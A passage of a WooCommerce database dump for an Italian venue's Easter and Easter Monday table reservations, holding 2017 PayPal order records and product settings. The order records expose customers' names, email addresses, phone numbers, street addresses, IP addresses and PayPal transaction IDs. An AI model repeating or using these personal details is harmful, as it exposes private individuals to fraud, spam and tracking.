15:21:06'),(3025,310,'_transaction_id','0LY437085W970702S'),(3026,310,'_order_stock_reduced','1'),(3027,310,'PayPal Transaction Fee','1.37'),(3028,311,'_order_key','wc_order_58a0da6e99346'),(3029,311,'_order_currency','EUR'),(3030,311,'_prices_include_tax','no'),(3031,311,'_customer_ip_address','194.183.69.75'),(3032,311,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0_5 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11B601 Safari/9537.53'),(3033,311,'_customer_user','0'),(3034,311,'_created_via','checkout'),(3035,311,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(3036,311,'_order_version','2.6.14'),(3037,311,'_billing_first_name','Marco'),(3038,311,'_billing_last_name','Gatti'),(3039,311,'_billing_email','mgatti84@gmail.com'),(3040,311,'_billing_phone','3665998525'),(3041,311,'_billing_address_1',''),(3042,311,'_billing_city',''),(3043,311,'_shipping_first_name','Marco'),(3044,311,'_shipping_last_name','Gatti'),(3045,311,'_shipping_company',''),(3046,311,'_shipping_country',''),(3047,311,'_shipping_address_1',''),(3048,311,'_shipping_address_2',''),(3049,311,'_shipping_city',''),(3050,311,'_shipping_state',''),(3051,311,'_shipping_postcode',''),(3052,311,'_payment_method','paypal'),(3053,311,'_payment_method_title','PayPal'),(3054,311,'_order_shipping',''),(3055,311,'_cart_discount','0'),(3056,311,'_cart_discount_tax','0'),(3057,311,'_order_tax','0'),(3058,311,'_order_shipping_tax','0'),(3059,311,'_order_total','30.00'),(3060,311,'Numero Persone Adulte','2'),(3061,311,'Numero bambini fino a 6 anni',''),(3062,311,'Numero ragazzi fino a 13 anni',''),(3063,311,'Files attached','[]'),(3064,311,'Payer PayPal address','MGATTI84@GMAIL.COM'),(3065,311,'Payer first name','MARCO'),(3066,311,'Payer last name','GATTI'),(3067,311,'Payment type','instant'),(3068,311,'_download_permissions_granted','1'),(3069,311,'_recorded_sales','yes'),(3070,311,'_paid_date','2017-02-12 22:59:09'),(3071,311,'_transaction_id','0VA47162B74821221'),(3072,311,'_order_stock_reduced','1'),(3073,311,'PayPal Transaction Fee','1.37'),(3074,312,'_order_key','wc_order_58a19050072dc'),(3075,312,'_order_currency','EUR'),(3076,312,'_prices_include_tax','no'),(3077,312,'_customer_ip_address','151.82.159.230'),(3078,312,'_customer_user_agent','Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1'),(3079,312,'_customer_user','6'),(3080,312,'_created_via','checkout'),(3081,312,'_cart_hash','b967513def2433faa2f782f051c04842'),(3082,312,'_order_version','2.6.14'),(3083,312,'_billing_first_name','Lorenzo'),(3084,312,'_billing_last_name','Bordini'),(3085,312,'_billing_email','Lorenzob@debsrl.com'),(3086,312,'_billing_phone','3484508210'),(3087,312,'_billing_address_1','Via Cavour 20'),(3088,312,'_billing_city','Misano adriatico'),(3089,312,'_shipping_first_name','Lorenzo'),(3090,312,'_shipping_last_name','Bordini'),(3091,312,'_shipping_company',''),(3092,312,'_shipping_country',''),(3093,312,'_shipping_address_1','Via Cavour 20'),(3094,312,'_shipping_address_2',''),(3095,312,'_shipping_city','Misano adriatico'),(3096,312,'_shipping_state',''),(3097,312,'_shipping_postcode',''),(3098,312,'_payment_method','paypal'),(3099,312,'_payment_method_title','PayPal'),(3100,312,'_order_shipping',''),(3101,312,'_cart_discount','0'),(3102,312,'_cart_discount_tax','0'),(3103,312,'_order_tax','0'),(3104,312,'_order_shipping_tax','0'),(3105,312,'_order_total','60.00'),(3106,312,'Numero Persone Adulte','4'),(3107,312,'Numero bambini fino a 6 anni',''),(3108,312,'Numero ragazzi fino a 13 anni',''),(3109,312,'Files attached','[]'),(3110,313,'_order_key','wc_order_58a191b765d99'),(3111,313,'_order_currency','EUR'),(3112,313,'_prices_include_tax','no'),(3113,313,'_customer_ip_address','79.6.135.6'),(3114,313,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/602.4.8 (KHTML, like Gecko) Version/10.0.3 Safari/602.4.8'),(3115,313,'_customer_user','0'),(3116,313,'_created_via','checkout'),(3117,313,'_cart_hash','b967513def2433faa2f782f051c04842'),(3118,313,'_order_version','2.6.14'),(3119,313,'_billing_first_name','giovanni'),(3120,313,'_billing_last_name','giannini'),(3121,313,'_billing_email','mr.josh81@gmail.com'),(3122,313,'_billing_phone','3204356290'),(3123,313,'_billing_address_1',''),(3124,313,'_billing_city',''),(3125,313,'_shipping_first_name','giovanni'),(3126,313,'_shipping_last_name','giannini'),(3127,313,'_shipping_company',''),(3128,313,'_shipping_country',''),(3129,313,'_shipping_address_1',''),(3130,313,'_shipping_address_2',''),(3131,313,'_shipping_city',''),(3132,313,'_shipping_state',''),(3133,313,'_shipping_postcode',''),(3134,313,'_payment_method','paypal'),(3135,313,'_payment_method_title','PayPal'),(3136,313,'_order_shipping',''),(3137,313,'_cart_discount','0'),(3138,313,'_cart_discount_tax','0'),(3139,313,'_order_tax','0'),(3140,313,'_order_shipping_tax','0'),(3141,313,'_order_total','60.00'),(3142,313,'Numero Persone Adulte','4'),(3143,313,'Numero bambini fino a 6 anni',''),(3144,313,'Numero ragazzi fino a 13 anni',''),(3145,313,'Files attached','[]'),(3146,313,'Payer PayPal address','mr.josh81@gmail.com'),(3147,313,'Payer first name','giovanni'),(3148,313,'Payer last name','giannini'),(3149,313,'Payment type','instant'),(3150,313,'_download_permissions_granted','1'),(3151,313,'_recorded_sales','yes'),(3152,313,'_paid_date','2017-02-13 12:03:14'),(3153,313,'_transaction_id','9U317029L7396013F'),(3154,313,'_order_stock_reduced','1'),(3155,313,'PayPal Transaction Fee','2.39'),(3156,312,'Payer PayPal address','Lorenzob@debsrl.com'),(3157,312,'Payer first name','lorenzo'),(3158,312,'Payer last name','bordini'),(3159,312,'Payment type','instant'),(3160,312,'_download_permissions_granted','1'),(3161,312,'_recorded_sales','yes'),(3162,312,'_paid_date','2017-02-13 12:07:20'),(3163,312,'_transaction_id','9D385381LX350520L'),(3164,312,'_order_stock_reduced','1'),(3165,312,'PayPal Transaction Fee','2.39'),(3166,314,'_order_key','wc_order_58a1a2c17e6ad'),(3167,314,'_order_currency','EUR'),(3168,314,'_prices_include_tax','no'),(3169,314,'_customer_ip_address','213.45.72.198'),(3170,314,'_customer_user_agent','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17'),(3171,314,'_customer_user','0'),(3172,314,'_created_via','checkout'),(3173,314,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(3174,314,'_order_version','2.6.14'),(3175,314,'_billing_first_name','claudio'),(3176,314,'_billing_last_name','lazzari'),(3177,314,'_billing_email','imarghe86@gmail.com'),(3178,314,'_billing_phone','3397244393'),(3179,314,'_billing_address_1',''),(3180,314,'_billing_city',''),(3181,314,'_shipping_first_name','claudio'),(3182,314,'_shipping_last_name','lazzari'),(3183,314,'_shipping_company',''),(3184,314,'_shipping_country',''),(3185,314,'_shipping_address_1',''),(3186,314,'_shipping_address_2',''),(3187,314,'_shipping_city',''),(3188,314,'_shipping_state',''),(3189,314,'_shipping_postcode',''),(3190,314,'_payment_method','paypal'),(3191,314,'_payment_method_title','PayPal'),(3192,314,'_order_shipping',''),(3193,314,'_cart_discount','0'),(3194,314,'_cart_discount_tax','0'),(3195,314,'_order_tax','0'),(3196,314,'_order_shipping_tax','0'),(3197,314,'_order_total','30.00'),(3198,314,'Numero Persone Adulte','2'),(3199,314,'Numero bambini fino a 6 anni',''),(3200,314,'Numero ragazzi fino a 13 anni',''),(3201,314,'Files attached','[]'),(3202,314,'Payer PayPal address','fillyourhomewithlove@gmail.com'),(3203,314,'Payer first name','Margherita'),(3204,314,'Payer last name','Succi'),(3205,314,'Payment type','instant'),(3206,314,'_download_permissions_granted','1'),(3207,314,'_recorded_sales','yes'),(3208,314,'_paid_date','2017-02-13 13:13:30'),(3209,314,'_transaction_id','1X2900223S648881A'),(3210,314,'_order_stock_reduced','1'),(3211,314,'PayPal Transaction Fee','1.37'),(3212,315,'_refund_amount','60'),(3213,315,'_order_currency','EUR'),(3214,315,'_order_shipping','0'),(3215,315,'_cart_discount','0'),(3216,315,'_cart_discount_tax','0'),(3217,315,'_order_total','-60.00'),(3218,316,'_order_key','wc_order_58a1ffd35367d'),(3219,316,'_order_currency','EUR'),(3220,316,'_prices_include_tax','no'),(3221,316,'_customer_ip_address','89.186.64.154'),(3222,316,'_customer_user_agent','Mozilla/5.0 (iPad; CPU OS 9_3_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13F69 Safari/601.1'),(3223,316,'_customer_user','0'),(3224,316,'_created_via','checkout'),(3225,316,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(3226,316,'_order_version','2.6.14'),(3227,316,'_billing_first_name','Nicola'),(3228,316,'_billing_last_name','Santarelli'),(3229,316,'_billing_email','nicola.santarelli@bancamediolanum.it'),(3230,316,'_billing_phone','3472481599'),(3231,316,'_billing_address_1','Via maroncelli 60'),(3232,316,'_billing_city','Forli'),(3233,316,'_shipping_first_name','Nicola'),(3234,316,'_shipping_last_name','Santarelli'),(3235,316,'_shipping_company',''),(3236,316,'_shipping_country',''),(3237,316,'_shipping_address_1','Via maroncelli 60'),(3238,316,'_shipping_address_2',''),(3239,316,'_shipping_city','Forli'),(3240,316,'_shipping_state',''),(3241,316,'_shipping_postcode',''),(3242,316,'_payment_method','paypal'),(3243,316,'_payment_method_title','PayPal'),(3244,316,'_order_shipping',''),(3245,316,'_cart_discount','0'),(3246,316,'_cart_discount_tax','0'),(3247,316,'_order_tax','0'),(3248,316,'_order_shipping_tax','0'),(3249,316,'_order_total','30.00'),(3250,316,'Numero Persone Adulte','2'),(3251,316,'Numero bambini fino a 6 anni','0'),(3252,316,'Numero ragazzi fino a 13 anni','0'),(3253,316,'Files attached','[]'),(3254,316,'Payer PayPal address','nicola.santarelli@bancamediolanum.it'),(3255,316,'Payer first name','nicola'),(3256,316,'Payer last name','santarelli'),(3257,316,'Payment type','instant'),(3258,316,'_download_permissions_granted','1'),(3259,316,'_recorded_sales','yes'),(3260,316,'_paid_date','2017-02-13 19:54:00'),(3261,316,'_transaction_id','8HE76071VF574200X'),(3262,316,'_order_stock_reduced','1'),(3263,316,'PayPal Transaction Fee','1.37'),(3264,318,'_order_key','wc_order_58a2c604909a2'),(3265,318,'_order_currency','EUR'),(3266,318,'_prices_include_tax','no'),(3267,318,'_customer_ip_address','31.193.34.192'),(3268,318,'_customer_user_agent','Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG GT-I9500 Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36'),(3269,318,'_customer_user','7'),(3270,318,'_created_via','checkout'),(3271,318,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(3272,318,'_order_version','2.6.14'),(3273,318,'_billing_first_name','Laura'),(3274,318,'_billing_last_name','Ugolini'),(3275,318,'_billing_email','lauraugolini87@gmail.com'),(3276,318,'_billing_phone','3385403481'),(3277,318,'_billing_address_1','strada cardio 91B'),(3278,318,'_billing_city','serravalle rsm'),(3279,318,'_shipping_first_name','Laura'),(3280,318,'_shipping_last_name','Ugolini'),(3281,318,'_shipping_company',''),(3282,318,'_shipping_country',''),(3283,318,'_shipping_address_1','strada cardio 91B'),(3284,318,'_shipping_address_2',''),(3285,318,'_shipping_city','serravalle rsm'),(3286,318,'_shipping_state',''),(3287,318,'_shipping_postcode',''),(3288,318,'_payment_method','paypal'),(3289,318,'_payment_method_title','PayPal'),(3290,318,'_order_shipping',''),(3291,318,'_cart_discount','0'),(3292,318,'_cart_discount_tax','0'),(3293,318,'_order_tax','0'),(3294,318,'_order_shipping_tax','0'),(3295,318,'_order_total','30.00'),(3296,318,'Numero Persone Adulte','2'),(3297,318,'Numero bambini fino a 6 anni','1'),(3298,318,'Numero ragazzi fino a 13 anni',''),(3299,318,'Files attached','[]'),(3300,319,'_order_key','wc_order_58a2f50b91415'),(3301,319,'_order_currency','EUR'),(3302,319,'_prices_include_tax','no'),(3303,319,'_customer_ip_address','89.186.39.9'),(3304,319,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(3305,319,'_customer_user','0'),(3306,319,'_created_via','checkout'),(3307,319,'_cart_hash','c0deb0caa754bfa582ad13c03b190a52'),(3308,319,'_order_version','2.6.14'),(3309,319,'_billing_first_name','Stefano'),(3310,319,'_billing_last_name','Benzi'),(3311,319,'_billing_email','stefano@benzi.biz'),(3312,319,'_billing_phone','3357567578'),(3313,319,'_billing_address_1','via saludecio, 15'),(3314,319,'_billing_city','RICCIONE'),(3315,319,'_shipping_first_name','Stefano'),(3316,319,'_shipping_last_name','Benzi'),(3317,319,'_shipping_company',''),(3318,319,'_shipping_country',''),(3319,319,'_shipping_address_1','via saludecio, 15'),(3320,319,'_shipping_address_2',''),(3321,319,'_shipping_city','RICCIONE'),(3322,319,'_shipping_state',''),(3323,319,'_shipping_postcode',''),(3324,319,'_payment_method','paypal'),(3325,319,'_payment_method_title','PayPal'),(3326,319,'_order_shipping',''),(3327,319,'_cart_discount','0'),(3328,319,'_cart_discount_tax','0'),(3329,319,'_order_tax','0'),(3330,319,'_order_shipping_tax','0'),(3331,319,'_order_total','30.00'),(3332,319,'Numero Persone Adulte','2'),(3333,319,'Numero bambini fino a 6 anni',''),(3334,319,'Numero ragazzi fino a 13 anni',''),(3335,319,'Files attached','[]'),(3336,319,'Payer PayPal address','stefano@benzi.biz'),(3337,319,'Payer first name','STEFANO'),(3338,319,'Payer last name','BENZI'),(3339,319,'Payment type','instant'),(3340,319,'_download_permissions_granted','1'),(3341,319,'_recorded_sales','yes'),(3342,319,'_paid_date','2017-02-14 13:17:00'),(3343,319,'_transaction_id','12484522VA200915U'),(3344,319,'_order_stock_reduced','1'),(3345,319,'PayPal Transaction Fee','1.37'),(3346,322,'_edit_lock','1555775689:2'),(3347,322,'_edit_last','2'),(3348,322,'_visibility','visible'),(3349,322,'_thumbnail_id','212'),(3350,322,'_downloadable','no'),(3351,322,'_virtual','no'),(3352,322,'_purchase_note',''),(3353,322,'_featured','no'),(3354,322,'_weight',''),(3355,322,'_length',''),(3356,322,'_width',''),(3357,322,'_height',''),(3358,322,'_product_attributes','a:0:{}'),(3359,322,'_regular_price','60'),(3360,322,'_sale_price',''),(3361,322,'_sale_price_dates_from',''),(3362,322,'_sale_price_dates_to',''),(3363,322,'_sold_individually','yes'),(3364,322,'_manage_stock','yes'),(3365,322,'_backorders','no'),(3366,322,'_stock','0'),(3367,322,'_stock_status','outofstock'),(3368,322,'_upsell_ids','a:0:{}'),(3369,322,'_crosssell_ids','a:0:{}'),(3370,322,'_price','60'),(3371,322,'_product_version','3.5.7'),(3372,322,'_product_image_gallery',''),(3373,322,'slide_template',''),(3374,322,'_yoast_wpseo_primary_product_cat','12'),(3375,322,'_yoast_wpseo_content_score','90'),(3376,322,'total_sales','17'),(3377,322,'_sku','pasqua-2pax'),(3381,323,'_edit_lock','1555775759:2'),(3382,323,'_edit_last','2'),(3383,323,'_visibility','visible'),(3384,323,'_thumbnail_id','212'),(3385,323,'_downloadable','no'),(3386,323,'_virtual','no'),(3387,323,'_purchase_note',''),(3388,323,'_featured','no'),(3389,323,'_weight',''),(3390,323,'_length',''),(3391,323,'_width',''),(3392,323,'_height',''),(3393,323,'_product_attributes','a:0:{}'),(3394,323,'_regular_price','90'),(3395,323,'_sale_price',''),(3396,323,'_sale_price_dates_from',''),(3397,323,'_sale_price_dates_to',''),(3398,323,'_sold_individually','yes'),(3399,323,'_manage_stock','yes'),(3400,323,'_backorders','no'),(3401,323,'_stock','0'),(3402,323,'_stock_status','outofstock'),(3403,323,'_upsell_ids','a:0:{}'),(3404,323,'_crosssell_ids','a:0:{}'),(3405,323,'_price','90'),(3406,323,'_product_version','3.5.7'),(3407,323,'_product_image_gallery',''),(3408,323,'slide_template',''),(3409,323,'_yoast_wpseo_primary_product_cat','12'),(3410,323,'_yoast_wpseo_content_score','90'),(3411,323,'total_sales','5'),(3412,323,'_sku','pasqua-3pax'),(3413,324,'_edit_lock','1555782307:2'),(3414,324,'_edit_last','2'),(3415,324,'_visibility','visible'),(3416,324,'_thumbnail_id','212'),(3417,324,'_downloadable','no'),(3418,324,'_virtual','no'),(3419,324,'_purchase_note',''),(3420,324,'_featured','no'),(3421,324,'_weight',''),(3422,324,'_length',''),(3423,324,'_width',''),(3424,324,'_height',''),(3425,324,'_product_attributes','a:0:{}'),(3426,324,'_regular_price','120'),(3427,324,'_sale_price',''),(3428,324,'_sale_price_dates_from',''),(3429,324,'_sale_price_dates_to',''),(3430,324,'_sold_individually','yes'),(3431,324,'_manage_stock','yes'),(3432,324,'_backorders','no'),(3433,324,'_stock','0'),(3434,324,'_stock_status','outofstock'),(3435,324,'_upsell_ids','a:0:{}'),(3436,324,'_crosssell_ids','a:0:{}'),(3437,324,'_price','120'),(3438,324,'_product_version','3.5.7'),(3439,324,'_product_image_gallery',''),(3440,324,'slide_template',''),(3441,324,'_yoast_wpseo_primary_product_cat','12'),(3442,324,'_yoast_wpseo_content_score','90'),(3443,324,'total_sales','13'),(3444,324,'_sku','pasqua-4pax'),(3445,325,'_edit_lock','1555794260:2'),(3446,325,'_edit_last','2'),(3447,325,'_visibility','visible'),(3448,325,'_thumbnail_id','212'),(3449,325,'_downloadable','no'),(3450,325,'_virtual','no'),(3451,325,'_purchase_note',''),(3452,325,'_featured','no'),(3453,325,'_weight',''),(3454,325,'_length',''),(3455,325,'_width',''),(3456,325,'_height',''),(3457,325,'_product_attributes','a:0:{}'),(3458,325,'_regular_price','150'),(3459,325,'_sale_price',''),(3460,325,'_sale_price_dates_from',''),(3461,325,'_sale_price_dates_to',''),(3462,325,'_sold_individually','yes'),(3463,325,'_manage_stock','yes'),(3464,325,'_backorders','no'),(3465,325,'_stock','0'),(3466,325,'_stock_status','outofstock'),(3467,325,'_upsell_ids','a:0:{}'),(3468,325,'_crosssell_ids','a:0:{}'),(3469,325,'_price','150'),(3470,325,'_product_version','3.5.7'),(3471,325,'_product_image_gallery',''),(3472,325,'slide_template',''),(3473,325,'_yoast_wpseo_primary_product_cat','12'),(3474,325,'_yoast_wpseo_content_score','90'),(3475,325,'total_sales','2'),(3476,325,'_sku','pasqua-5pax'),(3478,327,'_edit_lock','1555507906:2'),(3479,327,'_edit_last','2'),(3480,327,'_visibility','visible'),(3481,327,'_thumbnail_id','212'),(3482,327,'_downloadable','no'),(3483,327,'_virtual','no'),(3484,327,'_purchase_note',''),(3485,327,'_featured','no'),(3486,327,'_weight',''),(3487,327,'_length',''),(3488,327,'_width',''),(3489,327,'_height',''),(3490,327,'_product_attributes','a:0:{}'),(3491,327,'_regular_price','60'),(3492,327,'_sale_price',''),(3493,327,'_sale_price_dates_from',''),(3494,327,'_sale_price_dates_to',''),(3495,327,'_sold_individually','yes'),(3496,327,'_manage_stock','yes'),(3497,327,'_backorders','no'),(3498,327,'_stock','1'),(3499,327,'_stock_status','instock'),(3500,327,'_upsell_ids','a:0:{}'),(3501,327,'_crosssell_ids','a:0:{}'),(3502,327,'_price','60'),(3503,327,'_product_version','3.5.7'),(3504,327,'_product_image_gallery',''),(3505,327,'slide_template',''),(3506,327,'_yoast_wpseo_primary_product_cat',''),(3507,327,'_yoast_wpseo_content_score','90'),(3508,327,'total_sales','21'),(3509,327,'_sku','pasquetta-2pax'),(3510,328,'_edit_lock','1554323097:1'),(3511,328,'_edit_last','1'),(3512,328,'_visibility','visible'),(3513,328,'_thumbnail_id','212'),(3514,328,'_downloadable','no'),(3515,328,'_virtual','no'),(3516,328,'_purchase_note',''),(3517,328,'_featured','no'),(3518,328,'_weight',''),(3519,328,'_length',''),(3520,328,'_width',''),(3521,328,'_height',''),(3522,328,'_product_attributes','a:0:{}'),(3523,328,'_regular_price','90'),(3524,328,'_sale_price',''),(3525,328,'_sale_price_dates_from',''),(3526,328,'_sale_price_dates_to',''),(3527,328,'_sold_individually','yes'),(3528,328,'_manage_stock','yes'),(3529,328,'_backorders','no'),(3530,328,'_stock','0'),(3531,328,'_stock_status','outofstock'),(3532,328,'_upsell_ids','a:0:{}'),(3533,328,'_crosssell_ids','a:0:{}'),(3534,328,'_price','90'),(3535,328,'_product_version','3.5.7'),(3536,328,'_product_image_gallery',''),(3537,328,'slide_template','default'),(3538,328,'_yoast_wpseo_primary_product_cat','13'),(3539,328,'_yoast_wpseo_content_score','90'),(3540,328,'total_sales','4'),(3541,328,'_sku','pasquetta-3pax'),(3542,329,'_edit_lock','1554323097:1'),(3543,329,'_edit_last','1'),(3544,329,'_visibility','visible'),(3545,329,'_thumbnail_id','212'),(3546,329,'_downloadable','no'),(3547,329,'_virtual','no'),(3548,329,'_purchase_note',''),(3549,329,'_featured','no'),(3550,329,'_weight',''),(3551,329,'_length',''),(3552,329,'_width',''),(3553,329,'_height',''),(3554,329,'_product_attributes','a:0:{}'),(3555,329,'_regular_price','120'),(3556,329,'_sale_price',''),(3557,329,'_sale_price_dates_from',''),(3558,329,'_sale_price_dates_to',''),(3559,329,'_sold_individually','yes'),(3560,329,'_manage_stock','yes'),(3561,329,'_backorders','no'),(3562,329,'_stock','2'),(3563,329,'_stock_status','instock'),(3564,329,'_upsell_ids','a:0:{}'),(3565,329,'_crosssell_ids','a:0:{}'),(3566,329,'_price','120'),(3567,329,'_product_version','3.5.7'),(3568,329,'_product_image_gallery',''),(3569,329,'slide_template',''),(3570,329,'_yoast_wpseo_primary_product_cat','13'),(3571,329,'_yoast_wpseo_content_score','90'),(3572,329,'total_sales','9'),(3573,329,'_sku','pasquetta-4pax'),(3574,331,'_edit_lock','1554322788:1'),(3575,331,'_edit_last','1'),(3576,331,'_visibility','visible'),(3577,331,'_thumbnail_id','212'),(3578,331,'_downloadable','no'),(3579,331,'_virtual','no'),(3580,331,'_purchase_note',''),(3581,331,'_featured','no'),(3582,331,'_weight',''),(3583,331,'_length',''),(3584,331,'_width',''),(3585,331,'_height',''),(3586,331,'_product_attributes','a:0:{}'),(3587,331,'_regular_price','180'),(3588,331,'_sale_price',''),(3589,331,'_sale_price_dates_from',''),(3590,331,'_sale_price_dates_to',''),(3591,331,'_sold_individually','yes'),(3592,331,'_manage_stock','yes'),(3593,331,'_backorders','no'),(3594,331,'_stock','1'),(3595,331,'_stock_status','instock'),(3596,331,'_upsell_ids','a:0:{}'),(3597,331,'_crosssell_ids','a:0:{}'),(3598,331,'_price','180'),(3599,331,'_product_version','3.5.7'),(3600,331,'_product_image_gallery',''),(3601,331,'slide_template',''),(3602,331,'_yoast_wpseo_primary_product_cat','13'),(3603,331,'_yoast_wpseo_content_score','90'),(3604,331,'_wp_old_slug','prenotazione-tavolo-5-persone-pasqua'),(3605,331,'total_sales','6'),(3606,331,'_sku','pasquetta-6pax'),(3607,330,'_edit_lock','1490223484:1'),(3608,330,'_edit_last','1'),(3609,328,'_wc_rating_count','a:0:{}'),(3610,328,'_wc_average_rating','0'),(3611,329,'_wc_rating_count','a:0:{}'),(3612,329,'_wc_average_rating','0'),(3613,331,'_wc_rating_count','a:0:{}'),(3614,331,'_wc_average_rating','0'),(3617,330,'slide_template','default'),(3618,330,'_yoast_wpseo_content_score','90'),(3619,330,'_yoast_wpseo_primary_category','1'),(3620,333,'_edit_lock','1554408458:2'),(3621,333,'_edit_last','2'),(3622,333,'_visibility','visible'),(3623,333,'_thumbnail_id','212'),(3624,333,'_downloadable','no'),(3625,333,'_virtual','no'),(3626,333,'_purchase_note',''),(3627,333,'_featured','no'),(3628,333,'_weight',''),(3629,333,'_length',''),(3630,333,'_width',''),(3631,333,'_height',''),(3632,333,'_product_attributes','a:0:{}'),(3633,333,'_regular_price','210'),(3634,333,'_sale_price',''),(3635,333,'_sale_price_dates_from',''),(3636,333,'_sale_price_dates_to',''),(3637,333,'_sold_individually','yes'),(3638,333,'_manage_stock','yes'),(3639,333,'_backorders','no'),(3640,333,'_stock','0'),(3641,333,'_stock_status','outofstock'),(3642,333,'_upsell_ids','a:0:{}'),(3643,333,'_crosssell_ids','a:0:{}'),(3644,333,'_price','210'),(3645,333,'_product_version','3.5.7'),(3646,333,'_product_image_gallery',''),(3647,333,'slide_template',''),(3648,333,'_yoast_wpseo_primary_product_cat','12'),(3649,333,'_yoast_wpseo_content_score','90'),(3650,333,'_wp_old_slug','prenotazione-tavolo-5-persone-pasqua'),(3651,333,'total_sales','1'),(3652,333,'_sku','pasqua-7pax'),(3653,334,'_edit_lock','1554322790:1'),(3654,334,'_edit_last','1'),(3655,334,'_visibility','visible'),(3656,334,'_thumbnail_id','212'),(3657,334,'_downloadable','no'),(3658,334,'_virtual','no'),(3659,334,'_purchase_note',''),(3660,334,'_featured','no'),(3661,334,'_weight',''),(3662,334,'_length',''),(3663,334,'_width',''),(3664,334,'_height',''),(3665,334,'_product_attributes','a:0:{}'),(3666,334,'_regular_price','240'),(3667,334,'_sale_price',''),(3668,334,'_sale_price_dates_from',''),(3669,334,'_sale_price_dates_to',''),(3670,334,'_sold_individually','yes'),(3671,334,'_manage_stock','yes'),(3672,334,'_backorders','no'),(3673,334,'_stock','0'),(3674,334,'_stock_status','outofstock'),(3675,334,'_upsell_ids','a:0:{}'),(3676,334,'_crosssell_ids','a:0:{}'),(3677,334,'_price','240'),(3678,334,'_product_version','3.5.7'),(3679,334,'_product_image_gallery',''),(3680,334,'slide_template',''),(3681,334,'_yoast_wpseo_primary_product_cat',''),(3682,334,'_yoast_wpseo_content_score','90'),(3683,334,'_wp_old_slug','prenotazione-tavolo-5-persone-pasqua'),(3684,334,'total_sales','1'),(3685,334,'_sku','pasquetta-8pax'),(3686,336,'_wp_attached_file','2017/03/easter.jpeg'),(3687,337,'_edit_lock','1554322935:1'),(3688,337,'_edit_last','1'),(3689,337,'_visibility','visible'),(3690,337,'_thumbnail_id','212'),(3691,337,'_downloadable','no'),(3692,337,'_virtual','no'),(3693,337,'_purchase_note',''),(3694,337,'_featured','no'),(3695,337,'_weight',''),(3696,337,'_length',''),(3697,337,'_width',''),(3698,337,'_height',''),(3699,337,'_product_attributes','a:0:{}'),(3700,337,'_regular_price','150'),(3701,337,'_sale_price',''),(3702,337,'_sale_price_dates_from',''),(3703,337,'_sale_price_dates_to',''),(3704,337,'_sold_individually','yes'),(3705,337,'_manage_stock','yes'),(3706,337,'_backorders','no'),(3707,337,'_stock','0'),(3708,337,'_stock_status','outofstock'),(3709,337,'_upsell_ids','a:0:{}'),(3710,337,'_crosssell_ids','a:0:{}'),(3711,337,'_price','150'),(3712,337,'_product_version','3.5.7'),(3713,337,'_product_image_gallery',''),(3714,337,'slide_template',''),(3715,337,'_yoast_wpseo_primary_product_cat','13'),(3716,337,'_yoast_wpseo_content_score','90'),(3717,337,'_wp_old_slug','prenotazione-tavolo-5-persone-pasqua'),(3718,336,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:284;s:6:\"height\";i:177;s:4:\"file\";s:19:\"2017/03/easter.jpeg\";s:5:\"sizes\";a:5:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:19:\"easter-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:19:\"easter-200x177.jpeg\";s:5:\"width\";i:200;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:1;}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"easter-150x150.jpeg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:19:\"easter-100x100.jpeg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:19:\"easter-230x143.jpeg\";s:5:\"width\";i:230;s:6:\"height\";i:143;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3719,337,'total_sales','5'),(3720,337,'_sku','pasquetta-5pax'),(3754,337,'_wc_rating_count','a:0:{}'),(3755,337,'_wc_average_rating','0'),(3762,322,'_wc_rating_count','a:0:{}'),(3763,322,'_wc_average_rating','0'),(3764,327,'_wc_rating_count','a:0:{}'),(3765,327,'_wc_average_rating','0'),(3766,323,'_wc_rating_count','a:0:{}'),(3767,323,'_wc_average_rating','0'),(3768,324,'_wc_rating_count','a:0:{}'),(3769,324,'_wc_average_rating','0'),(3770,325,'_wc_rating_count','a:0:{}'),(3771,325,'_wc_average_rating','0'),(3772,333,'_wc_rating_count','a:0:{}'),(3773,333,'_wc_average_rating','0'),(3774,334,'_wc_rating_count','a:0:{}'),(3775,334,'_wc_average_rating','0'),(3778,324,'_wc_review_count','0'),(3779